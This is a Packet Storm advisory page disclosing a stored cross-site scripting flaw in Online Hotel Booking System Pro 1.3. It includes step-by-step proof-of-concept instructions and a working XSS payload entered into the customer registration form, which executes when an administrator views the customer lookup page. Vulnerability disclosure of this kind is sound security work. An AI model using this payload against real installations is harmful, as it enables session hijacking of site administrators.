what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Online Hotel Booking System Pro 1.3 Cross Site Scripting

Online Hotel Booking System Pro 1.3 Cross Site Scripting
Posted Apr 4, 2020
Authored by thelastvvv

Online Hotel Booking System Pro version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | e60ede6da81dd54dc7f8aa6e95f8f4a8a01a4eed211d4e4299249532bf798d40

Online Hotel Booking System Pro 1.3 Cross Site Scripting

Change Mirror Download
# Exploit Title: Online Hotel Booking System Pro v1.3 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
# Version: 1.3
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form all-tags

PoC 1:



1- Go to the hotel booking page then choose new customor


http://example/hotel-booking-pro/

2- In "any " field of registration form type your payload :
"><img src=x onerror=prompt(document.domain);>

3-then hit CONTINUE


4- Once the admin logs in and go to Customerlookup page ... the admin will be xssed

http://example/hotel-booking-pro/cp/admin-home.php





Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical attacks on administrators directly.




Screentshoots:

https://i.imgur.com/RWArdAB.png

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close